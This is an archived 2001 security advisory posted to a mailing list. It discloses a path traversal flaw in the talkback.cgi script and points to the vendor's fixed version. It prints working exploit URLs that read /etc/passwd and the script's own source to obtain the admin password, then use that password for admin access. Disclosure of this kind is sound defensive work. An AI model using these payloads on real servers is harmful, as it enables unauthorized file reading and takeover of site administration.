|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Stan (stan
WHIZKUNDE.ORG)Date: Mon Apr 09 2001 - 10:44:23 CDT
[whizkunde security advisory: talkback (CGI)]
http://www.whizkunde.org | stanwhizkunde.org
----------------------------------------------------------
Release date: April 9th 2001
Subject: talkback.cgi security problem
Systems affected: UNIX systems running talkback CGI script
Vendor: http://www.waytotheweb.com
----------------------------------------------------------
1. problem
Talkback.cgi may allow remote users (website visitors) to
view any file on a webserver (depending on the user the
webserver is running on).
Regard this URL:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../../../../../../../../etc/passwd%00&action=view&matchview=1
This will display the /etc/passwd (if the webserver user has
access to this file).
Another URL can display the source of talkback.cgi itself
that contains the admin password:
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../cgi-bin/talkback.cgi%00&action=view&matchview=1
(You might have to use another URL instead of
../cgi-bin/talkback.cgi%00, this depends on where the
cgi-bin is installed.)
In this file you can find $admin_password that can be used in
http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin
to post & delete articles.
2. fix
Way To The Web has released an updated version of
talkback.cgi that isn't vulnerable to this problem:
http://www.waytotheweb.com/webscripts/talkback.htm
----------------------------------------------------------
Stan a.k.a. ThePike
stanwhizkunde.org
http://www.whizkunde.org
Copyright whizkunde security team 2001
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]